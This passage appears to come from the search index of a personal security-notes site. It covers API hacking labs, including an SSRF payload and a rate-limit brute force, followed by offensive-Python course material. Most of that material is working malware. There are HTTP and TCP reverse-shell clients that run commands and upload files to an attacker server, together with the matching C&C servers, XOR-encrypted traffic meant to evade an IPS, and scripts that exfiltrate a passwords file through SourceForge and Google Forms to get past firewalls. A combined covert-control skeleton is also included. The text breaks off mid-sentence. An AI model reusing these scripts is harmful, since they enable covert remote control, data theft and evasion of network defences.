              ","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api3","title":"Writeup: API3","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api4","title":"Writeup: API4","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api5","title":"Writeup: API5","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api6","title":"Writeup: API6","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api7","title":"Writeup: API7","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api8","title":"Writeup: API8","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api9","title":"Writeup: API9","text":"

In this lab we'll be testing for improper assets management, using the endpoint provided in the Postman collection.

              Several interesting things to test:

• Only a 4-digit PIN code is required to log in.
• We are running this request against version 2 of the API.
• There are two significant headers:
  • X-RateLimit-Limit, set to 5
  • X-RateLimit-Remaining, set to 4.

With this in mind, we can run that request six times, obtaining a 500 Internal Server Error instead of the 200 response:

But if we run the same request, modifying the POST path from v2 to v1, then:

              Headers \"X-RateLimit-Limit\" and \"X-RateLimit Remaining\" are missing. Looks like there is no Rate limit set for this request and a Brute Force attack can be conducted. So we do it using Burp Intruder and... bingo! we have the flag:

              ","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api10","title":"Writeup: API10","text":"","tags":["api"]},{"location":"hackingapis/scanning-apis/","title":"Scanning APIs","text":"General index of the course
              • Setting up the environment
              • Api Reconnaissance.
              • Endpoint Analysis.
              • Scanning APIS.
              • API Authorization Attacks.
              • Exploiting API Authorization.
              • Testing for Improper Assets Management.
              • Mass Assignment.
              • Server side Request Forgery.
              • Injection Attacks.
              • Evasion and Combining techniques.
              • Setting up the labs + Writeups

Once you have discovered an API and used it as intended, you can perform a baseline vulnerability scan. Most of these scans return false negatives (because the scanners are web-oriented), but they are helpful in structuring next steps.

              Basic scans you can run:

              ","tags":["api"]},{"location":"hackingapis/scanning-apis/#nikto","title":"nikto","text":"

              You will get some results related to headers such as:

              • The anti-clickjacking X-Frame-Options header is not present.
              • The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
              • The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

              Run:

              nikto -h http://localhost:8888\n
              ","tags":["api"]},{"location":"hackingapis/scanning-apis/#owasp-zap","title":"OWASP zap","text":"

              To launch it, run:

              zaproxy\n

              You can do several things:

              • Run an automatic attack.
              • Import your spec.yml file and run an automatic attack.
              • Run a manual attack.

              The manual explore option will allow you to perform authenticated scanning. Set the URL to your target, make sure the HUD is enabled, and choose \"Launch Browser\".

              ","tags":["api"]},{"location":"hackingapis/scanning-apis/#how-to-run-a-manual-attack","title":"How to run a manual attack","text":"

              Select \"Continue to your target\". On the right-hand side of the HUD, you can set the Attack Mode to On. This will begin scanning and performing authenticated testing of the target. Now you perform all the actions (sign up a new user, log in into the account, modify you avatar, post a comment...).

After that, OWASP ZAP allows you to narrow the results to your target. How? In the Sites module, right-click on your site and select \"Include in context\". After that, click on the target-shaped icon to filter sites by context.

With the results, start your analysis and weed out false positives.

              ","tags":["api"]},{"location":"hackingapis/server-side-request-forgery-ssrf/","title":"SSRF attack - Server side Request Forgery","text":"General index of the course
              • Setting up the environment
              • Api Reconnaissance.
              • Endpoint Analysis.
              • Scanning APIS.
              • API Authorization Attacks.
              • Exploiting API Authorization.
              • Testing for Improper Assets Management.
              • Mass Assignment.
              • Server side Request Forgery.
              • Injection Attacks.
              • Evasion and Combining techniques.
              • Setting up the labs + Writeups

              This vulnerability allows an attacker to supply URLs that expose private data, scan the target's internal network, or compromise the target through remote code execution.

              ","tags":["api"]},{"location":"hackingapis/server-side-request-forgery-ssrf/#identify-endpoints","title":"Identify endpoints","text":"

Read your collection thoroughly and search for requests that:

• Include full URLs in the POST body or parameters
• Include URL paths (or partial URLs) in the POST body or parameters
• Have headers that include URLs, like Referer
• Allow user input that may result in the server retrieving resources
              ","tags":["api"]},{"location":"hackingapis/server-side-request-forgery-ssrf/#ssrf-types","title":"SSRF types","text":"","tags":["api"]},{"location":"hackingapis/server-side-request-forgery-ssrf/#in-band-ssrf","title":"In-Band SSRF","text":"

A URL is supplied as the attack payload. The request is sent, and the content of your supplied URL is displayed back to you in the response.

              A possible endpoint:

              {\n    \"inventory\":\"http://store.com/api/v3/inventory/item/12345\"\n}\n

              SSRF code:

              {\n    \"inventory\":\"http://maliciousserver.com\"\n}\n
              ","tags":["api"]},{"location":"hackingapis/server-side-request-forgery-ssrf/#blind-ssrf","title":"Blind SSRF","text":"

It's similar to the In-Band attack, but in this case the response gives no indication that the server is vulnerable:

              HTTP/1.1 200 OK  \nheaders...  \n{}\n

But there is a way to test it. Burp Suite Pro has a great tool called Burp Collaborator. Collaborator can be leveraged to set up a web server that provides the details of any requests made to your random URL.
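
With one of the free tools listed below, the test is the same as the In-Band case, except the evidence shows up out-of-band. For instance, with a hypothetical webhook.site URL:

{\n    \"inventory\":\"https://webhook.site/<your-uuid>\"\n}\n\n# If a request appears in your webhook.site dashboard, the server fetched your URL: blind SSRF confirmed.\n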

              ","tags":["api"]},{"location":"hackingapis/server-side-request-forgery-ssrf/#tools-to-test-blind-ssrf","title":"Tools to test Blind SSRF","text":"

              Free:

              • https://webhook.site
              • http://pingb.in/
              • https://requestbin.com/
              • https://canarytokens.org/

              Paid:

              • Burp Collaborator.
              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/","title":"Setting up the environment","text":"General index of the course
              • Setting up the environment
              • Api Reconnaissance.
              • Endpoint Analysis.
              • Scanning APIS.
              • API Authorization Attacks.
              • Exploiting API Authorization.
              • Testing for Improper Assets Management.
              • Mass Assignment.
              • Server side Request Forgery.
              • Injection Attacks.
              • Evasion and Combining techniques.
              • Setting up the labs + Writeups

For this course, I'll use a Kali machine installed on VirtualBox. I downloaded the latest .ova version, 2022.3.

              After that, follow these steps:

              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#1-install-a-kali-ova-on-virtualbox","title":"1. Install a kali ova on VirtualBox","text":"

For this course I've downloaded a Kali .ova machine. I will use VirtualBox and modify these elements of the .ova installation:

              • 4GB RAM
              • Bridge mode Interface
              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#2-update-our-system","title":"2. Update our system","text":"
sudo apt update -y\nsudo apt upgrade -y\nsudo apt dist-upgrade -y\n

              Also, update credentials:

sudo passwd kali    # enter a new, more complex password\nsudo useradd -m hapihacker\nsudo usermod -a -G sudo hapihacker\nsudo chsh -s /bin/zsh hapihacker\n
              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#3-install-burp-suite-and-make-sure-that-is-up-to-date","title":"3. Install Burp Suite and make sure that is up-to-date.","text":"
              sudo apt-get install burpsuite -y\n
              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#4-adding-extension-authorize-extension-to-burpsuite-this-will-require-to-have-jython-installed","title":"4. Adding extension Authorize extension to BurpSuite: this will require to have Jython installed.","text":"
1. Download Jython from https://www.jython.org/download.html and add the .jar file in the Extender Options.
2. Under the Extender BApp Store, search for Autorize and install the extension.
              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#5-install-foxy-proxy-in-firefox-to-proxy-the-traffic-to-burpsuite-and-postman-once-intalled-well-set-up-manually-two-proxies","title":"5. Install Foxy-proxy in Firefox to proxy the traffic to BurpSuite and Postman. Once intalled, we'll set up manually two proxies","text":"
              1. Postman - 127.0.0.1 - 5555
              2. BurpSuite - 127.0.0.1 - 8080.

Download the BurpSuite certificate and install it in Firefox.

              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#6-mitmweb-certificate-setup","title":"6. MITMweb certificate setup","text":"
1. Launch mitmweb from the terminal:
              mitmweb\n

              We need to make sure that Burpsuite is stopped, since mitmweb is also going to use port 8080.

2. Activate the 8080 proxy entry in FoxyProxy in Firefox; with BurpSuite stopped, this sends the traffic to mitmweb.

3. Download mitmproxy-ca-cert.pem from mitm.it (in Firefox) and install it in Firefox.

              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#7-install-postman","title":"7. Install Postman","text":"
sudo wget https://dl.pstmn.io/download/latest/linux64 -O postman-linux-x64.tar.gz && sudo tar -xvzf postman-linux-x64.tar.gz -C /opt && sudo ln -s /opt/Postman/Postman /usr/bin/postman\n
              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#8-install-mitmproxy2swagger","title":"8. Install mitmproxy2swagger","text":"
              cd /opt\nsudo pip3 install mitmproxy2swagger\n
              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#9-install-git","title":"9. Install git","text":"
              cd /opt\nsudo apt-get install git\n
              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#10-install-docker","title":"10. Install docker","text":"
              cd /opt\nsudo apt-get install docker.io docker-compose\n
              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#11-install-go","title":"11. Install Go","text":"
cd /opt\nsudo apt install golang-go\n
              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#12-install-json-web-token-toolkit-v2","title":"12. Install JSON Web Token Toolkit v2","text":"
cd /opt\nsudo git clone https://github.com/ticarpi/jwt_tool\ncd jwt_tool\npython3 -m pip install termcolor cprint pycryptodomex requests\n\n# Optional: make an alias for jwt_tool.py\nsudo chmod +x jwt_tool.py\nsudo ln -s /opt/jwt_tool/jwt_tool.py /usr/bin/jwt_tool\n
              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#13-install-kiterunner","title":"13. Install Kiterunner","text":"
              sudo git clone https://github.com/assetnote/kiterunner.git\ncd kiterunner\nsudo make build\nsudo ln -s /opt/kiterunner/dist/kr /usr/bin/kr\n
              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#14-install-arjun","title":"14. Install Arjun","text":"

              More about arjun.

sudo git clone https://github.com/s0md3v/Arjun.git\n
              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#15-install-owasp-zap","title":"15. Install OWASP ZAP","text":"
              sudo apt install zaproxy\n

              Run ZAP and open the \"Manage Add-ons\" option and make sure that the add-on \"OpenAPI Support\" is marked to be updated.

              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#16-have-these-useful-wordlist-api-oriented","title":"16. Have these useful wordlist API oriented","text":"
# SecLists https://github.com/danielmiessler/SecLists\nsudo wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \\  \n&& sudo unzip SecList.zip \\  \n&& sudo rm -f SecList.zip\n\n# Hacking-APIs https://github.com/hAPI-hacker/Hacking-APIs\nsudo wget -c https://github.com/hAPI-hacker/Hacking-APIs/archive/refs/heads/main.zip -O HackingAPIs.zip \\  \n&& sudo unzip HackingAPIs.zip \\  \n&& sudo rm -f HackingAPIs.zip\n
              ","tags":["api"]},{"location":"python/bypassing-ips-with-handmade-xor-encryption/","title":"Bypassing IPS with handmade XOR Encryption","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
  • Tuning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
  • Using a Dynamic DNS instead of your bare attacker public IP.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
  • Hijack the Internet Explorer process to bypass a host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
• Malware and cryptography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
• Password Hijacking:
                • Simple keylogger in python.
                • Hijacking Keepass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.

The idea is to encrypt our traffic to avoid network analyzers or intrusion prevention sensors. SSL or SSH is not recommended here, since Next Generation Firewalls have the ability to decrypt them and pass the plain text to the IPS, where it will be recognized.

• Create a secret key of 1 KB that matches the size of the socket buffer, and use an XOR operation to encrypt the message:
# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\n# The random and string libraries are used to generate a random string with flexible criteria\nimport string\nimport random\n\n\n# Random Key Generator\nkey = ''.join(random.choice(string.ascii_lowercase + string.ascii_uppercase + string.digits + '^!\\$%&/()=?{[]}+~#-_.:,;<>|\\\\') for _ in range(0, 1024))\n\n\nprint(key)\n\nprint (\"\\n\" + \"Key length = \" + str(len(key)))\n\nmessage = 'ipconfig'\nprint(\"Msg: \" + message + '\\n')\n\n\n# Here we define a dedicated function called str_xor. We pass two values to it: the first is the message (s1) that we want to encrypt or decrypt, and the second parameter is the XOR key (s2). We can bind the encryption and decryption phases in one function because the XOR operation is exactly the same whether we encrypt or decrypt; the only difference is that when we encrypt we pass the message in clear text, and when we decrypt we pass the encrypted message\n\n\ndef str_xor(s1, s2):\n    return \"\".join([chr(ord(c1) ^ ord(c2)) for (c1, c2) in zip(s1,s2)])\n\n\n# First we zip the message and the XOR key into a list of character pairs in tuple format >> for (c1,c2) in zip(s1,s2)\n\n# Next we go through each tuple, converting the characters to integers using the ord function; once converted, we can perform the exclusive OR on them >> ord(c1) ^ ord(c2)\n\n# Then we convert the result back to ASCII using the chr function >> chr(ord(c1) ^ ord(c2))\n# As a last step we merge the resulting array of characters into a single string using >> \"\".join \n\nenc = str_xor(message, key)\n\nprint(\"Encrypted message is \" + \"\\n\" + enc + \"\\n\")\n\ndec = str_xor(enc, key)\nprint(\"Decrypted message is \" + \"\\n\" + dec + \"\\n\")\n

To integrate XOR encryption into this client-side Python script, you can modify it to encrypt the communication between the client and the server using the XOR algorithm.

              Here is an example of how to modify the script to incorporate XOR encryption:

import string\nimport random\nimport requests\nimport os\nimport subprocess\nimport time\n\n# Random Key Generator\n# NOTE: the C&C server needs the same key to decrypt the exfiltrated output; in practice it would be pre-shared or exchanged out of band\nkey = ''.join(random.choice(string.ascii_lowercase + string.ascii_uppercase + string.digits + '^!\\$%&/()=?{[]}+~#-_.:,;<>|\\\\') for _ in range(0, 1024))\n\n# Define XOR function (the same operation encrypts and decrypts)\ndef str_xor(s1, s2):\n    return \"\".join([chr(ord(c1) ^ ord(c2)) for (c1, c2) in zip(s1,s2)])\n\nwhile True:\n    # Send GET request to C&C server to get command\n    req = requests.get('http://192.168.0.152:8080')\n    command = req.text\n\n    # If command is to terminate, break out of loop\n    if 'terminate' in command:\n        break\n\n    # If command is to grab a file and send it to the C&C server\n    elif 'grab' in command:\n        grab, path = command.split(\"*\")\n        if os.path.exists(path):\n            url = \"http://192.168.0.152:8080/store\"\n            filer = {'file': open(path, 'rb')}\n            r = requests.post(url, files=filer)\n        else:\n            post_response = requests.post(url='http://192.168.0.152:8080', data='[-] Not able to find the file!'.encode())\n\n    # If command is to search for files with a specific extension\n    elif 'search' in command:\n        # Split command into path and file extension\n        command = command[7:] # cut off the first 7 characters; output would be C:\\\\*.pdf\n        path, ext = command.split('*')\n        lists = '' # here we define a string where we will append our results\n\n        # Walk through directories and search for files with the specified extension\n        for dirpath, dirname, files in os.walk(path):\n            for file in files:\n                if file.endswith(ext):\n                    lists = lists + '\\n' + os.path.join(dirpath, file)\n        requests.post(url='http://192.168.0.152:8080', data=lists)\n\n    # If command is a shell command, execute it and send the XOR-encrypted output to the C&C server\n    else:\n        # Execute the command and capture stdout and stderr (decoded to str so str_xor can process them)\n        CMD = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        # Encrypt the output with the XOR key before sending it back\n        post_response = requests.post(url='http://192.168.0.152:8080', data=str_xor(CMD.stdout.read().decode(errors='ignore'), key))\n        post_response = requests.post(url='http://192.168.0.152:8080', data=str_xor(CMD.stderr.read().decode(errors='ignore'), key))\n\n    time.sleep(3)\n
              ","tags":["python","python pentesting","scripting","ips","xor encryption"]},{"location":"python/bypassing-next-generation-firewalls/","title":"Bypassing Next Generation Firewalls","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
  • Tuning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
  • Using a Dynamic DNS instead of your bare attacker public IP.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
  • Hijack the Internet Explorer process to bypass a host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
• Malware and cryptography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
• Password Hijacking:
                • Simple keylogger in python.
                • Hijacking Keepass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.

Corporate firewalls (Next Generation Firewalls) can block traffic based on the reputation of the target IP/URL. This means that once we manage to execute the malicious client-side script on the victim's machine, the next generation firewall might block or drop the connection if the reputation or rank of the target URL/IP, as found in a pool of resources supplied by the vendor, is categorized as low.

To overcome this filter, modern malware uses trusted targets.

              ","tags":["python","python pentesting","scripting","bypassing techniques","firewall","bypassing firewall","next generation firewalls"]},{"location":"python/bypassing-next-generation-firewalls/#using-source-forge-for-data-exfiltration","title":"Using Source Forge for data exfiltration","text":"

1. Sign up at SourceForge.

You will get credentials for configuring your SFTP client in step 3.

2. Install FileZilla. It will work as our SFTP client:

              sudo apt-get install filezilla\n

3. Configure FileZilla and connect.

              Host: web.sourceforge.net\nusername: usernameinSourceForge\npassword: passwordinSourceForge\nport: 22\n

4. Install these two Python libraries on the victim's machine: paramiko and scp.

              pip install paramiko\npip install scp\n

              5. Run the script on the victim's machine:

'''\nCaution\n--------\nUsing this script for any malicious purpose is prohibited and against the law. Please read SourceForge terms and conditions carefully. \nUse it at your own risk. \n'''\n\n# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport paramiko\nimport scp\n\n# File Management on SourceForge \n# [+] https://sourceforge.net/p/forge/documentation/File%20Management/\n\n\nssh_client = paramiko.SSHClient() # creating an ssh_client instance using the paramiko SSHClient class\n\nssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\nssh_client.connect(\"web.sourceforge.net\", username=\"myusernameatSourceForge\", password=\"PASSWORD HERE\") # Authenticate ourselves to the SourceForge server; user and password from step 1\nprint (\"[+] Authenticating against web.sourceforge.net\")\n\nscp_client = scp.SCPClient(ssh_client.get_transport()) # after a successful authentication the ssh session is passed into the SCPClient function (named scp_client so it does not shadow the scp module)\n\nscp_client.put(\"C:/Users/Alex/Desktop/passwords.txt\") # upload a file, for instance passwords.txt\nprint (\"[+] File is uploaded\")\n\nscp_client.close()\n\nprint(\"[+] Closing the socket\")\n
              ","tags":["python","python pentesting","scripting","bypassing techniques","firewall","bypassing firewall","next generation firewalls"]},{"location":"python/bypassing-next-generation-firewalls/#using-google-forms-for-submitting-output","title":"Using Google Forms for submitting output","text":"

              1. Create a Google Form with a quick test and copy the link of the survey.

2. Copy the field name of the form (the entry.XXXXXXXXXX identifier) from the page source of the Google Form.

3. Paste the URL of the survey plus the field name into the script:

'''\nCaution\n--------\nUsing this script for any malicious purpose is prohibited and against the law. Please read Google terms and conditions carefully. \nUse it at your own risk. \n'''\n\n# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\n\nimport requests\n\nurl = 'https://docs.google.com/forms/d/1Ndjnm5YViqIYXyIuoTHsCqW_YfGa-vaaKEahY2cc5cs/formResponse'\n\nform_data = {'entry.1301128713':'Lets see how we can use this, in the next exercise'}\n\nr = requests.post(url, data=form_data)\n\n# Submitting form-encoded data in requests:\n# http://docs.python-requests.org/en/latest/user/quickstart/#more-complicated-post-requests\n
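
If digging through the page source by hand is tedious, the entry.* field identifiers can also be pulled out programmatically. A minimal sketch, assuming the form's public /viewform URL (the form ID below is the one used in the script above):

import re\nimport requests\n\n# Fetch the public form page and grep the entry.<digits> field identifiers out of its HTML\nhtml = requests.get('https://docs.google.com/forms/d/1Ndjnm5YViqIYXyIuoTHsCqW_YfGa-vaaKEahY2cc5cs/viewform').text\nprint(sorted(set(re.findall(r'entry\\.\\d+', html))))\n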
              ","tags":["python","python pentesting","scripting","bypassing techniques","firewall","bypassing firewall","next generation firewalls"]},{"location":"python/bypassing-next-generation-firewalls/#exercise","title":"Exercise","text":"
Try to combine the above ideas (Google Form + Twitter + SourceForge) into a single script and see if you can control your target without direct interaction.\n
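
A possible skeleton for the exercise, assuming the form URL and field name from the previous section, the SourceForge credentials from earlier, and a hypothetical trusted page (standing in for the Twitter channel) whose body carries the command; every URL and credential here is a placeholder:

import time\nimport subprocess\nimport requests\nimport paramiko\nimport scp\n\nFORM_URL = 'https://docs.google.com/forms/d/1Ndjnm5YViqIYXyIuoTHsCqW_YfGa-vaaKEahY2cc5cs/formResponse'\nFORM_FIELD = 'entry.1301128713'\nCOMMAND_URL = 'https://example.com/status.txt' # hypothetical trusted page carrying the command\n\nwhile True:\n    command = requests.get(COMMAND_URL).text.strip()\n    if 'terminate' in command:\n        break\n    elif 'grab' in command: # grab*<path>: ship the file out through SourceForge over SCP\n        grab, path = command.split('*')\n        ssh = paramiko.SSHClient()\n        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n        ssh.connect('web.sourceforge.net', username='myusernameatSourceForge', password='PASSWORD HERE')\n        scp_client = scp.SCPClient(ssh.get_transport())\n        scp_client.put(path)\n        scp_client.close()\n    else: # anything else: run it and submit the output through the Google Form\n        CMD = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        requests.post(FORM_URL, data={FORM_FIELD: CMD.stdout.read() + CMD.stderr.read()})\n    time.sleep(60)\n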
              ","tags":["python","python pentesting","scripting","bypassing techniques","firewall","bypassing firewall","next generation firewalls"]},{"location":"python/coding-a-data-exfiltration-script-http-shell/","title":"Coding a data exfiltration script for a http shell","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-data-exfiltration-script-http-shell/#client-side","title":"Client side","text":"

To be run on the victim's computer.

# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport requests\nimport os\nimport subprocess\nimport time\n\nwhile True:\n\n    req = requests.get('http://192.168.0.152:8080')\n    command = req.text\n    if 'terminate' in command:\n        break\n\n\n# Now, similar to what we have done in our TCP reverse shell, we check if the file exists in the first place; if not, we \n# notify our attacker that we are unable to find the file, but if the file is there then we will:\n# 1. Append /store to the URL\n# 2. Add a dictionary key called 'file'\n# 3. The requests library uses a POST method called \"multipart/form-data\" when submitting files\n\n# All of the above points will be used on the server side to distinguish that this POST is submitting a file, NOT the usual command output. Please see the server script for more details on how we use these points to get the file\n\n\n    elif 'grab' in command:\n        grab, path = command.split(\"*\")\n        if os.path.exists(path): # check if the file is there\n            url = \"http://192.168.0.152:8080/store\" # Appended /store to the URL\n            files = {'file': open(path, 'rb')} # Add a dictionary key called 'file' where the key value is the file itself\n            r = requests.post(url, files=files) # Send the file; behind the scenes, the requests library uses the POST method called \"multipart/form-data\"\n        else:\n            post_response = requests.post(url='http://192.168.0.152:8080', data='[-] Not able to find the file!'.encode())\n    else:\n        CMD = subprocess.Popen(command, shell=True,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stdout.read())\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stderr.read())\n    time.sleep(3)\n
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-data-exfiltration-script-http-shell/#server-side","title":"Server side","text":"
# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport http.server\nimport os, cgi\n\nHOST_NAME = '10.0.2.15'\nPORT_NUMBER = 8080\n\nclass MyHandler(http.server.BaseHTTPRequestHandler):\n\n    def do_GET(self):\n\n        command = input(\"Shell> \")\n        self.send_response(200)\n        self.send_header(\"Content-type\", \"text/html\")\n        self.end_headers()\n        self.wfile.write(command.encode())\n\n    def do_POST(self):\n\n        # Here we use the points mentioned on the client side. If \"/store\" is in the URL, this POST is a file transfer, so we parse the Content-type header; if its value is 'multipart/form-data' we pass the POST parameters to the FieldStorage class. The \"fs\" object contains the values returned by FieldStorage in dictionary fashion.\n\n        if self.path == '/store':\n            try:\n                ctype, pdict = cgi.parse_header(self.headers.get('content-type'))\n                if ctype == 'multipart/form-data':\n                    fs = cgi.FieldStorage(fp=self.rfile, headers = self.headers, environ= {'REQUEST_METHOD': 'POST'})\n                else:\n                    print('[-] Unexpected POST request')\n                fs_up = fs['file'] # Remember, on the client side we submitted the file in dictionary fashion, using the key 'file'\n                with open('/home/kali/place_holder.txt', 'wb') as o: # create a placeholder called 'place_holder.txt' and write the received file into it. After the operation you need to rename this file back to the original name, so the extension gets recognized. \n                    print('[+] Writing file ..')\n                    o.write(fs_up.file.read())\n                    self.send_response(200)\n                    self.end_headers()\n            except Exception as e:\n                print(e)\n            return\n        self.send_response(200)\n        self.end_headers()\n        length = int(self.headers['Content-length'])\n        postVar = self.rfile.read(length)\n        print(postVar.decode())\n\nif __name__ == '__main__':\n    server_class = http.server.HTTPServer\n    httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler)\n    try:\n        httpd.serve_forever()\n    except KeyboardInterrupt:\n        print ('[!] Server is terminated')\n        httpd.server_close()\n
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-low-level-data-exfiltration-tcp/","title":"Coding a low level data exfiltration - TCP connection","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-low-level-data-exfiltration-tcp/#client","title":"Client","text":"

To be run on the victim's computer.

# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\nimport socket\nimport subprocess\nimport os\n\n\n# In the transfer function, we first check if the file exists in the first place; if not, we notify the attacker.\n# Otherwise, we create a loop where each iteration reads 1 KB of the file and sends it. Since the\n# server has no idea about the end of the file, we add a tag called 'DONE' to address this issue; finally we close the file\ndef transfer(s, path):\n    if os.path.exists(path):\n        f = open(path, 'rb')\n        packet = f.read(1024)\n        while len(packet) > 0:\n            s.send(packet)\n            packet = f.read(1024)\n        s.send('DONE'.encode())\n        f.close()\n    else:\n        s.send('File not found'.encode())\ndef connecting():\n    s = socket.socket()\n    s.connect((\"10.0.2.15\", 8080))\n\n    while True:\n        command = s.recv(1024)\n\n        if 'terminate' in command.decode():\n            s.close()\n            break\n\n\n# If we receive the grab keyword from the attacker, this is an indicator for a file transfer operation, hence we split the received command into two parts; the second part, which we are interested in, contains the file path, so we store it in a variable called path and pass it to the transfer function\n\n# Remember the Formula is  grab*<File Path>\n# Absolute path example:  grab*C:\Users\Hussam\Desktop\photo.jpeg\n        elif 'grab' in command.decode():\n            grab, path = command.decode().split(\"*\")\n            try:\n                transfer(s, path)\n            except:\n                pass\n        else:\n            CMD = subprocess.Popen(command.decode(), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n            s.send(CMD.stderr.read())\n            s.send(CMD.stdout.read())\ndef main():\n    connecting()\nmain()\n
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-low-level-data-exfiltration-tcp/#server","title":"Server","text":"

To be run on the attacker's computer.

# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\nimport os\nimport socket\n\ndef transfer(conn, command):\n    conn.send(command.encode())\n    grab, path = command.split(\"*\")\n    f = open('/home/kali/'+path, 'wb')\n    while True:\n        bits = conn.recv(2048)\n        if bits.endswith('DONE'.encode()):\n            f.write(bits[:-4]) # Write those last received bits without the word 'DONE' \n            f.close()\n            print ('[+] Transfer completed ')\n            break\n        if 'File not found'.encode() in bits:\n            print ('[-] Unable to find the file')\n            break\n        f.write(bits)\ndef connecting():\n    s = socket.socket()\n    s.bind((\"10.0.2.15\", 8080))\n    s.listen(1)\n    print('[+] Listening for incoming TCP connection on port 8080')\n    conn, addr = s.accept()\n    print('[+] We got a connection from', addr)\n\n    while True:\n        command = input(\"Shell> \")\n        if 'terminate' in command:\n            conn.send('terminate'.encode())\n            break\n        elif 'grab' in command:\n            transfer(conn, command)\n        else:\n            conn.send(command.encode())\n            print(conn.recv(1024).decode())\ndef main():\n    connecting()\nmain()\n
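
As the comments note, the end of the file is signalled by appending a 'DONE' tag. That sentinel is fragile: it can be split across two recv() calls, or even occur inside binary file data. A more robust alternative (not from the course) is to frame the transfer with an 8-byte length prefix; a minimal sketch of both ends:

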